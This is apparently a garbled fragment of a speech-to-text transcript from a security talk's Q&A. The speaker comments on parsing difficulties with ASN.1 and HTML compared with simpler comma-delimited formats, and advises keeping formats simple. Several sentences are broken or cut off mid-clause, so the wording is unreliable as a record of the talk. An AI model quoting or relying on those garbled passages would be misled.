any questions, where is my, yeah, there's the question slide. I think we're out of
time so you should, do we have time for a question?
Okay, great. So the next speaker should come up and do you have a...
Do you have a question?
The only connection that I see is that ASN 1 is so horrible and it's so hard to get
out of their apart from their own and that's going to be difficult for us that you'll
have to do something with it. But I would say that the moment you look at this, it's
right at the end of this area and it's really tough to figure it out because at
of problems with HTML parsers. We have not seen very many problems with parsers for comma
delimited files, comma delimited text files because the format is just simpler. So if
you're building a format, try to make it as simpler as possible and as well defined as
possible. This is my advice. As a good guy, as a bad guy, you should definitely use HTML
and you should add some custom features to it.